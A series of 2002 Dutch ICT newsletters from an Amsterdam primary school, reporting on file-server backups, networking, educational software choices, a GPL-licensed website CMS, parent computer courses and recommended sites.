systeem. Voor overige maatregelen en verdere informatie kunt u terecht op:
http://www.virusalert.nl/?show=virus&id=268

sites:

www.stemmenwijzer.nl Vorige week ook al genoemd, maar hebben jullie hem al bekeken?

groeten,
Karin
Dirk

2002-04-26 w17

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 17 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

ICT handicaps.

D. nog steeds eenarmige bandiet. Van de week knapte zijn elastiekje waar hij zijn pees mee moet oefenen.

Reactie op nieuwsbrief week 16.

Een collega kwam informatie halen over een virusscanner. Goed zo! Raadpleeg de site van www.virusalert.nl.

Priority.

Per 1 mei wordt ons abonnement gewijzigd. De prijs gaat ook flink omhoog (van 48 naar 65 euro per maand excl. btw). We kunnen dan wel onbeperkt internetten. Omdat Kennisnet nog steeds vaak niet vooruit te branden is, gaan we ons licht ook eens opsteken bij XS4all voor een adsl abonnement.

Werkstukken.

Groep 5 van onze 5/6 combinatie heeft keihard gewerkt aan het uitwerken van het eerste deel van hun werkstukken. Met 8 leerlingen tegelijk zaten ze te zwoegen.

Backup

Nu de fileserver werkt ontstaat ook de noodzaak van backups (reserve kopies voor de zekerheid). Dat gaan we in de vakantie op poten zetten. Wat we willen is dat iedere nacht een volledige backup van alle gebruikersbestanden wordt gemaakt. Voorlopig op een tweede harde schijf in de server (dat is nog niet zo veilig) en spoedig daarna op een aparte backup server die ergens anders staat.

Studiedag.

Afgelopen dinsdag hadden we een studiedag. Daar kwam ook ICT aan bod. In groepjes werden punten opgeschreven waar we tegenop lopen bij het geïntegreerd invoeren van programma's. Ook al was het het einde van een lange dag: iedereen heeft heel goed meegedacht. Er kwamen veel bruikbare op- en aanmerkingen. Conclusie: ict in je onderwijs moet "in plaats van" zijn en niet "extra". De vraag blijft nog: hoe doe je dat?

Bezoek van Kees Vos en Camille Rietmeijer.

Zij kwamen goede ideeën bij ons halen voor de komende ICT Baarsjesdag. Zelf hadden ze net zoveel. Wij benadrukten dat, als ICT geïntegreerd is in je onderwijs, het arbeidsbesparend moet zijn.

RekenWeb

Sinds we RekenWeb op de server hebben doen de kinderen in de hal op de 1e verdieping (6 computers op rij) wie de meeste punten haalt bij de flitsoefeningen met het rekenrekje. Hartverwarmend leuk! En het sluit helemaal aan waar we mee bezig zijn met onze nieuwe rekenmethode (Wis en Reken).

Het programma is te zien bij www.fi.uu.nl. Wij hebben de cd rom bij hen gekocht voor 20 euro. Zijn geld meer dan waard.

School Website Onderhoud Systeem (SWOS)

Mark vordert gestaag en binnenkort kunnen we met testen beginnen.

sites van de week:

die hebben we niet.

Neem een abonnement op het maki electronische magazine via www.maki.nl.

Nu twee weken geen leuke nieuwtjes van ons.

groeten,
Karin
Dirk

2002-05-24 w21

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 21 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Cursus ouders.

De cursus vindt nog steeds elke dinsdag bij ons op school plaats.

Volgend jaar reclame maken, dat de ouders op het buurthuis computercursussen kunnen volgen. Het buurthuis wordt waarschijnlijk nog voor de zomervakantie op het internet aangesloten.

Scholing 2002-2003

Naschoolse activiteit volgende schooljaar.

In samenwerking met de docent die door het buurthuis is ingehuurd bekijken we of het mogelijk is om volgend jaar een cursus blind typen te organiseren. Als dat eenmaal loopt, dan zijn we misschien zelf in staat om het onder schooltijd te organiseren. Na allerlei zoektochten op het internet langs vele forums zijn we terechtgekomen bij de cursus TypingMaster. http://www.anmass.nl/scholen.htm

Heeft er iemand ervaring mee?

Het is ook erg belangrijk, dat de kinderen thuis kunnen oefenen. Dus daar moet ook op gelet worden bij de aanschaf van een programma.

Werkgroep ICT

De volgende punten zijn o.a. aan de orde gekomen:

De scholing van volgend jaar; hoe belangrijk het is om de enquête voor het OCA in te vullen, omdat Monique daar houvast aan heeft om de introductie van ICT en klassenmanagement goed te organiseren.

Verder is besloten dat we voorlopig de programma's van de Bosatlas voor topografie zullen gebruiken voor het oefenen, omdat die kaarten het meest lijken op de atlas. We hebben dus tot nu toe geen topografieprogramma kunnen vinden, dat ook bijhoudt wat de leerlingen hebben gedaan.

We gaan ook vaststellen hoeveel werkstukken minimaal gemaakt moeten worden op de computer in de bovenbouw.

Dirk legt uit hoe de server werkt en hoe het inloggen moet, en dat elke groep een emailadres kan krijgen. Met het gebruik van email in de klas komt ook het gevaar van virussen weer opdoemen. Op de server staat een programma dat mails op virussen scant.

ICT in de Baarsjes

Afgelopen woensdagmiddag was er weer een (slechtbezochte) bijeenkomst. Voornaamste punt: de afwezigheid van beleidsmedewerkers van het stadsdeel was zeer voelbaar omdat het ging om kaders m.b.t. praktische implementatie van ICT in de scholen.

Ook gesproken over kostbaarheid van netwerken. Dirk heeft onze leverancier doorgegeven en Kees Vos zal contact met hem opnemen om te zorgen dat er flink geconcurreerd kan worden tussen de verschillende aanbieders.

Dirk had na afloop nog contact met een leerkracht van de Westerweel. Het aanleggen van een netwerkje aldaar is een fluitje van een cent en hoeft waarschijnlijk zelfs dat bedrag niet te kosten.

Ze zouden nog contact met ons opnemen.

Bestandsserver (Samba)

We ontdekten dat ons backup-systeem geen lege mappen kopieert. Dat is niet handig in ons geval waar iedere leerling een mapje heeft en zelfstandig daarin weer submappen kan aanmaken. We vroegen aan de maker van het systeem om het op te lossen en dat we daar graag financieel aan willen bijdragen. Voor US $ 100 krijgen we de verbetering die we willen. Ziehier de kracht en de vreugde van vrije software en de gedachten erachter. Zie voor het backup systeem:

http://hightek.org

Linux conferentie.

Op 12 juni is er een kleine Linux conferentie voor het onderwijs in Rotterdam. We gaan er naar toe. Linux begint wereldwijd in het onderwijs vaste voet aan de grond te krijgen omdat:

- publiek geld effectiever besteed wordt,

- je minder afhankelijk van één software aanbieder (Microsoft) bent,

- Linux sneller, stabieler en goedkoper is.

Conferentie zie:

http://www.nllgg.nl/nllgg/bijeenkomsten/onderwijs/congres.php

Sites:

www.leren.nl

Leren op Internet: hier vind je duizenden kennisbronnen over allerlei onderwerpen, praktische adviezen om effectiever te leren en een gratis maandelijkse nieuwsbrief.

www.instruct.nl

Instruct is een educatieve uitgeverij voor computergebruik, automatisering, informatica en aanverwante terreinen van Basisonderwijs t/m MBO-opleidingen.

Je kunt er een demo diagnostische toets voor het DRO afleggen.

www.digischool.nl

Kijk eens in een forum. Als je zelf mee wilt praten moet je je aanmelden.

Karin
Dirk

2002-05-31 w22

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 22 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Werkstukken groep 7 van de 7/8 combinatie.

Deze week is er heel hard gewerkt om de werkstukken af te krijgen. De acht leerlingen van de 7/8 combinatie hebben apart taalles en in die tijd is er de afgelopen weken gewerkt aan het uitwerken op de computer van de werkstukken. Thuis en op school is in het klad geschreven. Daarna is het op school achter de computer uitgewerkt. Compleet met het opzoeken van plaatjes en invoegen.

Het was heel leerzaam: Onze Samba bestandsserver was onmisbaar. De instellingen voor het opslaan van plaatjes moest op Word aangepast worden. De kleurenprinter bij John (onze onmisbare conciërge) moest aanstaan en ingesteld worden op de computers op de 1e verdieping (dus hangen in het netwerk). Hadden we nog niet gedaan.

Verder hebben we gemerkt, dat de kinderen de werkstukken extra mooi willen maken met koppen in WordArt. Kinderen die rommelig werken maken het heel moeilijk om dan een net werkstuk te maken. Er ging veel tijd zitten in het uitvlooien van wat er op een bepaalde plek moest staan. Ook is er veel in allerlei kleuren geschreven. Dit brengt ons aan het denken: tekst in zwart, koppen eventueel verfraaid, maar eigenlijk beter ook gewoon in zwart . Alleen de voorpagina met toeters en bellen en de plaatjes in kleur. En die plaatjes. We hebben ze gedownload van GOOGLE. Als ze klein zijn kun je ze groter “trekken”. Maar dan worden ze vaag. Hoe doe je dat zonder verlies van kwaliteit: ze groter maken???

CMS

Content Management System

Het beheersysteem voor de websites van onze scholen is in aantocht. Volgende week hebben we er een gesprek over. Wij mogen al wat experimenteren op de website www.starwave.nl.

Mark de Haan is druk bezig van alles voor ons te ontwikkelen. Er zit ook nog een bepaalde ideologie achter.

Ideologie.

Open source: De ontwikkeling van het systeem wordt betaald door het Stadsdeel 'De Baarsjes'. Niet om het voor ons alleen te houden, maar om het als het klaar is aan 'de wereld' te geven. Het CMS wordt dus gepubliceerd onder de GPL licentie. Dat wil zeggen dat iedereen het gratis mag hebben, het mag verbeteren en veranderen. Echter, de verbeteringen moeten ook weer gratis ter beschikking van iedereen komen. Zo draagt Stadsdeel 'De Baarsjes' bij aan de ontwikkeling van publiek toegankelijke vrije software.

Bijna alles wat we op de computer gebruiken/nodig hebben is te verkrijgen als vrije software.

Dat betekent niet dat we voor een dubbeltje op de eerste rang willen zitten. Het betekent, dat we de software naar onze eigen hand willen zetten. Wij willen meewerken aan het tot stand brengen van software die iedereen graag wil gebruiken. En daar betalen we ook voor.

Computer cursus voor ouders.

Elke maandag na schooltijd kan er geoefend worden. Daar werd deze week voor het eerst van gebruik gemaakt.

Type cursus.

We zijn er nog niet uit. Welke cursus wordt het? Ik zelf vind Typing Master veel prettiger. Maar Type Basic heeft ook een versie om er thuis mee te oefenen.

Dirk had nog een Type Trainer.

Je wordt er gek van. Want die eerste twee hebben dan ook nog zo’n ingewikkelde constructie met licenties per zoveel leerlingen en je moet betalen voor de thuisgebruikers.

sites:

http://home.hccnet.nl/a.manssen/ppo/index.html

Heeft u of uw school iets aan te bieden of zoekt u of uw school iets?
Plaats uw (gratis) oproep of advertentie op dit Prikbord.
Uw advertentie wordt na 2 maanden van het Prikbord verwijderd!

Dirk
Karin

2002-06-07 w23

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 23 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Werkstukken.

Met een volgende groep van 8 leerlingen begonnen aan werkstukken. In de klas is het goed voorbereid. Ik heb al geleerd van de vorige keren. Maar kinderen hebben eigen ideeën, waar je niet op voorbereid bent: één bedacht, dat er een ruimte links van de tekst moest komen: er zaten allemaal spaties voor. Een ander kind had de introductie op het OCA niet meegemaakt en deed tussen elk woord een tab. Of er wordt een enter gegeven om een zin op de volgende regel te zetten, als dat niet nodig is. Bij de volgende groep moet eerst even wat herhaald worden. Kinderen zijn héél enthousiast.

Overleg over het Content Management Systeem.

We hadden afgelopen dinsdag een afspraak met Dirk, Ellen Warmer, Mark de Haan en mezelf. Jammer genoeg was Ellen ziek en hebben we met zijn drieën vervolgafspraken gemaakt. Het is de bedoeling, dat ook de andere scholen in de Baarsjes het programma gaan gebruiken om hun website te onderhouden. Spannend.

Cursus blind tiepen.

Met de docent van de cursus voor ouders een principe afspraak gemaakt voor volgend jaar: bij de naschoolse activiteiten komt een cursus blind tikken voor kinderen. Tien keer een uur. Misschien kunnen we het daarna zelf organiseren en dan zouden we hem kunnen inzetten voor een cursus tekstverwerken voor kinderen o.i.d. Begroting wordt ingediend bij het Stadsdeel.

Ons Backup Systeem

Vincent Stemen heeft deze week de verbeteringen afgeleverd die we twee weken gelden aan hem gevraagd hebben. Voor US$ 100,-- hebben we nu een flitsend systeem dat ook de lege mappen van de leerlingen back-upt. Het kan overigens nog veel meer! Als Dirk nou eens zou leren hoe over een netwerk back-ups te maken, dan kan 't dat ook. Op dit moment scheelt het ons al veel werk als we onverhoopt moeten back-uppen (bij een computercrash bijvoorbeeld).

Verder zie je hier duidelijk één van de voordelen van Vrije Software. Als je wat wilt, ben je in direct contact met de maker(s). Je vraagt wat je nodig hebt en je bepaalt samen wat een redelijke prijs is. De verbetering aan het programma is nu voor iedereen gratis beschikbaar.

http://hightek.org

Dat is wel even wat anders dan bij Microsoft aankloppen!

Nieuwsgroepen.

Dirk en Karin
Dirk

2002-06-14 w24

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 24 - 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Werkstukken.

Het back-uppen van de bestanden van de gebruikers van de Sambaserver heeft zijn dienst bewezen. Een paar kinderen waren de inhoud van hun werkstuk kwijt geraakt en op de back-up konden ze teruggevonden worden. Opslaan is blijkbaar moeilijker dan we dachten en moet ook geleerd worden. Omdat we iedere nacht een back-up maken en die een week bewaren kunnen rampen vaak voorkomen worden.

Schoolkrant groep 8.

Alle leerlingen van groep 8 hebben een stukje voor de schoolkrant getiept. Het wordt een soort afscheidskrant.

Cursus blind tiepen.

Nog geen antwoord van de mensen van het Stadsdeel die goedkeuring (en geld) moeten geven aan ons plan voor de naschoolse tiepcursus.

Stunt van de week.

Iemand probeerde van de week om in de adresbalk van de internet explorer een emailadres in te tikken om zo een email te versturen.

Eigenlijk is dat helemaal geen gek idee.

ROC.

Er is een plan om laag- of niet- geschoolde allochtone moeders met computers te leren omgaan. Daarvoor worden allerlei contacten gelegd. Ook met het buurthuis. Als de moeders van de basiseducatie weer een geschikte ruimte bij ons op school krijgen (na de verbouwing) dan opent het veel perspectieven. Er zullen dan toch netwerk kabels getrokken worden. De ruimte kan dan ook gebruikt worden voor de ouders i.v.m de voorschool.

Ruimte.

Voorlopig moeten we het doen met onze opstelling in de hal op de eerste verdieping. Nu waarschijnlijk de verbouwing nog een tijdje op zich laat wachten is het zaak de opstelling wat te fatsoeneren: draden wegwerken.

Emailadres bij de kleuters.

De groep oudste kleuters heeft nu ook een e-mail adres in de klas. groep2@node11ef5.a2000.nl

Content Management Systeem.

We verwachten dat het nog voor de vakantie is geïnstalleerd zodat we er in de vakantie mee kunnen experimenteren. Je kunt n.l. de website van de school ook van huis uit onderhouden.

Linux conferentie

Dirk was woensdag op een conferentie, georganiseerd door de Nederlandse Linux Gebruikers Groep (NLLGG) in Rotterdam.

Hij hield er een lezing over de school en hoe we ICT inzetten.

De lezing is te vinden op:

http://utopia.knoware.nl/users/schoutdi/linuxlez.htm

Veel nieuwe contacten opgedaan en een goed verhaal gehoord over SchoolLAN. http://www.schoollan.nl . Dat zou wel eens wat voor ons en voor het stadsdeel kunnen zijn. Als alternatief zeker het onderzoeken waard.

Nieuwsgroepen en forums, vervolg.

Ze hebben weer hun dienst bewezen, want we hebben tweedehands rekenboeken voor groep 7 en 8 op de kop weten te tikken van basisschool De Ceder in Veenendaal. Dank! Dank! Dank!

sites:

http://www.nederlandict.nl/links/linksnieuws.htm

Hier is de brief te lezen die geschreven is aan informateur Donner waarin wordt gewezen op het belang van ICT in het onderwijs.

http://www.nlip.nl/

Hier een open brief aan het nieuwe kabinet over het ICT onderwijs.

http://www.ictopschool.net

Doelstelling
Ict op School zet zich in voor verbetering van ICT-producten en -diensten gericht op integratie van ICT in primair en voortgezet onderwijs. De stichting fungeert als een soort procescoördinator en consumentenorganisatie.

Hoofdtaken
De Stichting Ict op School onderscheidt vier hoofdtaken:

http://www.leren.nl/rubriek/computers_en_internet/problemen_oplossen/ en http://www.computertips.nl

Websites die helpen bij het oplossen van computerproblemen. Bijvoorbeeld de methoden om oorzaken op te sporen, tips en trucs, software-hulpjes, kennisbanken en vraagbaken.

2002-06-21 w25

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 25 - 2002 21 juni 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Werkstukken.

Het back-uppen van de server heeft zijn dienst weer bewezen. Alleen moest ik nu zelf proberen een verdwenen bestand terug te vinden en dat mislukte een beetje. Het is nog wennen aan de procedure. Maar de Linux omgeving is wel heel “normaal”. Het wijkt af van Windows, maar het gebruik lijkt er toch op.

Software beoordeling.

De onderbouw heeft nog één bijeenkomst op het OCA tegoed. Maar omdat Malmberg maar niet over de brug kwam met de definitieve versie van Letterpret is die bijeenkomst er bij in geschoten. Deze week zijn we toch nog met een delegatietje de programma’s “Letterpret” en “Schatkist met de Muis” gaan vergelijken. Met allerlei documentatie ernaast en beoordelingscriteria. O, o wat moeilijk. We zijn er nog niet uit. Schatkist met de Muis lijkt uitgebreider te zijn. Letterpret lijkt wat sneller te zijn, in de zin van: kortere oefeningen.

Na de vakantie gaan we de boel nog eens rustig beoordelen.

Er komt nog bij, dat we eigenlijk de kleutersoftware in een netwerk willen laten draaien en Zwijsen (Schatkist met de Muis) is niet vooruit te branden in een netwerk.

Cursus blind tiepen.

Nog geen antwoord van de mensen van het Stadsdeel die goedkeuring (en geld) moeten geven aan ons plan voor de naschoolse tiepcursus.

Fatsoeneren.

We hebben van de week alle elektriciteit- en netwerkkabels die onder de zes computers in de hal op de grond lagen, netjes weggewerkt. Met wurgbandjes. Nu kan er daar weer lekker schoongemaakt worden.

Inloggen.

We moeten duidelijker instructie geven hoe iedereen inlogt op een computer. Want als je goed inlogt en je gaat in Word werken, dan kun je je eigen map op de server in één klap zien (bij openen en opslaan). Wie fout inlogt vindt zijn/haar map niet en bovendien wordt de instelling om bij juist inloggen je map te vinden tenietgedaan. We moeten nu steeds die instellingen opnieuw goed zetten. We weten nog niet hoe we dat moeten doen. De nieuwsgroep geeft nog geen uitsluitsel.

We hebben ook ingesteld, dat als er plaatjes gedownload worden, ze heel gemakkelijk in de eigen documentenmap worden opgeslagen (extra > opties > bestandslocaties). Op die manier kunnen de leerlingen heel simpel de op het internet gevonden plaatjes invoegen in hun document.

Sites van de week:

www.ictopschool.nl

Daarin kun je met een vragenlijstje de balans opmaken van hoe het ICT gebruik in je school ervoor staat. Op gebied van ICT-infrastructuur, deskundigheid, visie en beleid en educatieve programmatuur. De vier deel gebieden worden apart in een algehele Nederlandse schaal gezet en daarna nog beoordeeld op het totaal van ICT gebruik. Nou wijn zijn er nog niet, hoor! Maar dat weten we ook wel en daarom steken we ook volgend jaar nog geld in scholing en begeleiding van het OCA.

Tijdschriften:

http://www.vives.nl Warm aanbevolen!

Gratis en boordevol interessante nieuwtjes en software beoordelingen en sites.

E-zine:

www.maki.nl, redezine@maki.nl

Allerlei laatste nieuwtjes op onderwijsgebied, toegespitst op software en direct gebruik.

Volgende week laatste BIC van dit schooljaar met een verslag van de ICT borrel!

groeten,
Karin
Dirk

2002-06-28 w26

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nieuwsbrief Rosa Boekdrukker week 26 - 2002 28 juni 2002
Waar hebben we ons de afgelopen week op ICT gebied mee bezig gehouden?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Afgelopen week is er ook een hoop gebeurd, maar daar gaat deze nieuwsbrief niet over.

ICT BORREL

We hebben vorige week vrijdagmiddag een 'ICT borrel' georganiseerd voor allen die ons dit jaar geholpen en begeleid hebben langs de vele kronkelige paden, de grazige weiden (met woeste stieren) en wijdse vergezichten die het ICT landschap kenmerken.

Zonder hen hadden we:

+ niet een heleboel computers als schenking gekregen,

+ onze twee netwerken niet aan elkaar gekregen

+ de chat niet zo goed gewerkt.

+ niet zo'n goed script gehad dat ons UPC verbruik bijhoud.

+ Waren we nog onwetend van kleutersoftware die ook op Linux kan draaien

+ geen netwerk

+ geen certified network

+ nog geen 'in-huis'ontwikkelde software

+ ons backup systeem niet zoals we het hebben willen

+ geen ouder-internet-cursus in school

+ geen steun en subsidie ontvangen voor ons Content Management Systeem

+ ….. nog veel meer ontbeert!.

Kortom, zonder de inzet van velen zou ICT op de Rosa Boekdrukker er heel anders uitzien. Zouden kinderen minder in aanraking komen met ICT en minder ICT-vaardig van school gaan. Zouden kinderen met achterstanden en leermoeilijkheden minder aandacht krijgen en …(zo kunnnen we doorgaan).

DANK JULLIE ALLEN,

namens leerlingen, bestuur, leerkrachten, directie, ICT'ers, ouders en vrijwilligers.

Voor ieders gemak, hierbij de lijst van genodigden, tezamen met hun gegevens; handig voor het netwerk. Helaas kon niet iedereen aanwezig zijn. Volgend jaar beter!!

Goede vakantie allemaal. Dit is de laatste BIC. Na de vakantie gaan we verder.

Karin
Dirk Schouten

schoutdi@knoware.nl
http://utopia.knoware.nl/users/schoutdi

Schooljaar 2002-2003

 1. 2002-08-16 w33
 2. 2002-08-23 w34
 3. 2002-08-30 w35
 4. 2002-09-06 w36
 5. 2002-09-13 w37
 6. 2002-09-20 w38
 7. 2002-09-27 w39
 8. 2002-10-04 w40
 9. 2002-10-11 w41
 10. 2002-10-18 w42
 11. 2002-10-25 w43
 12. 2002-11-01 w44
 13. 2002-11-08 w45
 14. 2002-11-15 w46
 15. 2002-11-22 w47
 16. 2002-11-29 w48
 17. 2002-12-06 w49
 18. 2002-12-13 w50
 19. 2002-12-20 w51
 20. 2003-01-10 w02
 21. 2003-01-17 w03
 22. 2003-01-24 w04
 23. 2003-01-31 w05
 24. 2003-02-07 w06
 25. 2003-02-14 w07
 26. 2003-02-21 w08
 27. 2003-03-07 w10
 28. 2003-03-14 w11
 29. 2003-03-21 w12
 30. 2003-03-28 w13
 31. 2003-04-04 w14
 32. 2003-04-11 w15
 33. 2003-04-18 w16
 34. 2003-04-25 w17
 35. 2003-05-09 w19
 36. 2003-05-16 w20
 37. 2003-05-23 w21
 38. 2003-05-30 w22
 39. 2003-06-06 w23
 40. 2003-06-13 w24
 41. 2003-06-20 w25
 42. 2003-06-27 w26

2002-08-16 w33

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker
Jaargang 2 - week 33
++++++++++++++++++++++++++++++++++++++++++++++++++++++

Wat hebben we zoal in de vakantie en in de eerste week van het nieuwe schooljaar gedaan:

FIREWALL/WEB/MAIL SERVER

De hele server ge-upgraded (het Operating System en de ge﮳talleerde programma's), email virus protectie erop gezet, het hele systeem op grotere HD gezet, backupmogelijkheid met verwisselbare HD ge﮳talleerd (ook op grotere HD).

FILE SERVER

Opnieuw ge﮳talleerd na crash (geen grafische interface meer erop i.v.m. veiligheid en crashgevoeligheid), CD Jukebox ge﮳talleerd (waardoor images van CD's afgespeeld kunnen worden), backup HD in server vergroot, backup HD in wisselframe vergroot.

KABELS

Via een vriend van Dirk die langs een container fietste kregen we een heleboel netwerkkabels die, zo te zien, uit een groot kantoor komen; genoeg om 3 scholen van kabels te voorzien.
Belangstellenden kunnen zich melden onder vermelding van wat ze in de aanbieding hebben.

SCHOOLLAN

Schoollan is een netwerk met server voor basisscholen. Er doen al veel basisscholen aan mee en wij denken daar ook over. In de vakantie hebben we de Schoollan server proefgedraaid. Hij installeerde zonder problemen en de configuratie zag er veelbelovend uit. Het verschilt allemaal weinig van wat we nu hebben, maar als we met Schoollan meedoen, zitten we onder een goede 'paraplu' wat betreft ondersteuning, helpdesk, vernieuwing etc. a.s. maandag hebben we een gesprek met iemand van Schoollan.

TELEFOON

We kregen van Cor (Bumitron in de Jan van Galenstraat 151) een telefooncentrale en een stelletje telefoons. De kleutergroepen hebben nu allen een telefoon en kunnen met elkaar bellen. De eerste berichten: De kleuters vinden het fantastisch!

DE GROENE BRUG

Begin van de vakantie hadden Karin en Dirk een gesprek met afd. Onderwijs over onze ICT-plannen, waarin we ook onze zorgen kenbaar maakten over de inbreng van 'De Groene Brug' in ICT in 'De Baarsjes'.

START SCHOOLJAAR

We hebben alle computers al weer aan het netwerk hangen en ook aan Internet. De groepen hebben hun nieuwe namen gekregen op de fileserver (groep 3a werd groep 4a enzovoort). We zijn nu bezig om te kijken welke cd-roms we op de fileserver kunnen zetten. De cd-roms van de Bosatlas doen het prima. We hebben ontdekt, dat we de cd-rom van de WERELD missen. Heeft iemand die even te leen?
Op de startvergadering van de ICT nascholing op 27 augustus willen we aandacht besteden aan afspraken m.b.t. Internetgebruik. In dezelfde bijeenkomst bespreken we ook 't bestaande beleid t.a.v. privé-computers in school. Meer informatie over die bijeenkomst volgende week.

TWEEDEHANDS MATERIAAL

We willen graag van wat printers en een printer/fax af. Belangstellenden kunnen zich melden.

WEB-SITE

Onze ontwerper, Mark de Haan, heeft hard gewerkt aan het CMS. (Content Management Systeem). Dat is een programma, waarmee we zelf de website kunnen bijhouden, zonder dat we al te veel kennis van zaken nodig hebben. Binnenkort te benaderen via rosaboekdrukker.net, maar nu nog even via ondervermelde link.

Sites:

www.minocw.nl/onderwijs/vakanties
Hier staan de schoolvakanties tot en met 2006 op vermeld.
http://24.132.30.245/index.php
Hier is het begin van onze nieuwe website te bewonderen. We houden hem qua vormgeving heel rustig. De bedoeling is, dat werk van de kinderen de belangrijkste ingrediënt van de site wordt.

groeten,
Karin
Dirk

2002-08-23 w34

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker
Jaargang 2 - week 34
++++++++++++++++++++++++++++++++++++++++++++++++++++++

RECTIFICATIE

In de vorige nieuwsbrief stond de volgende zinsnede in het stukje over De Groene Brug: "...zorgen kenbaar maakten over de inbreng van 'De Groene Brug' in ICT in 'De Baarsjes'."
Hier had moeten staan:
"...zorgen kenbaar maakten over de inbreng van de 'Groene Brug' in ICT op de Rosa Boekdrukker".
Het spijt ons dat wij de indruk gewekt hebben te spreken voor de hele Baarsjes.

Wat hebben we deze week zoal aan ICT gedaan

SCHOOLLAN

Maaandag hadden directie en ICT een bespreking met Ruud Suk van Stichting SchoolLAN. We willen er hier graag wat uitgebreider over vertellen omdat SchoolLAN voor scholen in de Baarsjes een aantrekkelijke optie kan zijn.
Stichting Schoollan wordt gesubsidieerd uit de verkoop van een Internetbedrijf dat een stelletje leerkrachten wat jaren geleden opzetten.
Ze verkochten het bedrijf toen het ze over de kop groeide en nu ploegen ze het geld terug in het onderwijs door projecten als schoollan te subsidiëren.
Schoollan is een blauwdruk van een lowbudget computernetwerk met de bijbehorende apparatuur ten behoeve van (basis)scholen. Zo kunnen scholen de kant en klare server met alle faciliteiten van Schoollan installeren zonder daar meer voor kwijt te zijn dan de kosten van een computer. De blauwdruk gaat uit van Windows computers voor de leerlingen en leerkrachten. Ook oude computers kunnen gebruikt worden.
De technische ondersteuning voor de basisscholen wordt geleverd door ROC's (Regionale Onderwijs Colleges, daarvan de ICT opleidingen) die hiermee leerlingen praktijkervaring bieden.
De onderwijskundige opzet is voor PABO's, wier leerlingen daardoor ervaring opdoen met de educatieve aspecten van ICT op school.
Daarnaast biedt SchoolLAN ook beheer op afstand.
Momenteel doen zo'n 40 scholen mee en twee ROC's. We zijn op dit moment ook met een paar andere Amsterdamse scholen in bespreking die zeer geinteresseerd zijn in SchoolLAN.

BORREL STADSDEEL

ICT heeft flink gelobbyd en een paar abonnees geworven voor de BIC.
Verder was het goed even met de beleidsmakers en collega's te praten. Zo hoor je nog eens wat.

DICTEE

Begin dit jaar kwam ons Dictee programma af. Het begint bekend te worden. In ICTopschool (zie link onder) stond erover:
Genoeg van dictees geven? Maak ze digitaal!
Op initiatief van een Amsterdamse school is een Dictee-programma gemaakt. Docenten worden verlost van herhaald werk en studenten kunnen op eigen tempo dictee-oefeningen doen. Gratis te downloaden! Verder is Dictee ook op de Schoollan server te vinden en maakt deel uit van een Frans educatief software pakket.
Het gaat er goed mee. En het zet de OBSRB op de wereldkaart!

LINKS

ICT op School:
http://www.ictopschool.net/infotheek/tips-uit-het-veld.html

SchoolLAN
http://www.schoollan.nl

2002-08-30 w35

++++++++++++++++++++++++++++++++++++++++++++++++++++++
ICT Nieuwsbrief Rosaboekdrukker
Jaargang 2 - week 35
++++++++++++++++++++++++++++++++++++++++++++++++++++++

WEBSITE

Afgelopen maandag is de website het WWW opgegaan. Het is nog niet klaar, er moet nog veel aan gesleuteld worden. En gevuld. Graag jullie commentaar, ideeë® en suggesties.
A.s. maandag om 13.00 uur komt de maker van de website (Mark) uitleggen hoe we de website met het door hem ontwikkelde programma kunnen onderhouden. Voor de goede orde vermelden we nog maar een keer dat de ontwikkeling van dit programma is gefinancierd door de Deelraad en voor iedereen gratis ter beschikking staat.

SERVERS

Dirk en Karin zijn bezig geweest met het inrichten en laten werken van Windows programma?s op de LINUX bestanden-server (de centrale computer waar programma?s op staan die door iedereen gebruikt kunnen worden). Bosatlas Nederland en Bosatlas Europa doen het. Ik-tover, -reken en -speel doen het ook.. We ontdekken, dat er behoorlijk wat educatieve software onder Linux kan werken op de server. (zie

INVENTARISATIE

Elk begin van het schooljaar moet er van alles opnieuw worden ingericht. Computers verhuizen, of leerkrachten krijgen een nieuwe groep. Dat soort dingen. Nu zijn we bezig om de computers zoveel mogelijk uniform te maken. Allemaal windows98 tweede editie. Vijf computers kunnen niet meer aan die maatstaven voldoen en gaan eruit. Nu afwachten wat we met de Pcdokter kunnen regelen. Als anderen willen meedoen met een aankoop, dan kunnen we mogelijk meer (en dus voordeliger) kopen. We horen het graag op korte termijn.

BEZOEK

Regelmatig krijgen we bezoek van mensen uit 't onderwijs die willen zien hoe wij ICT doen. Of die graag willen horen hoe we dingen op poten hebben gezet. Deze week kwamen de ICT co?natoren van de Corantijn en de ICT-er van de msgr. Bekkersschool en één van een school uit de Transvaalbuurt. We ontvangen ze graag.

NASCHOOLSE TYPE-CURSUS

We wilden een nieuwe naschoolse activiteit in het leven roepen: in 10 lessen blind leren typen. Helaas was het potje van de deelraad leeg en na overleg en beraad hebben we besloten de cursus éénmalig en als project uit de ICT gelden te financieren. Van dat geld moeten we een goed programma betalen en een docent. Die docent hebben we gevonden in de vorm van Wouter Meijer, die vorig jaar de cursussen in het buurthuis voor ouders heeft verzorgd.

ICT STUDIEMIDDAG

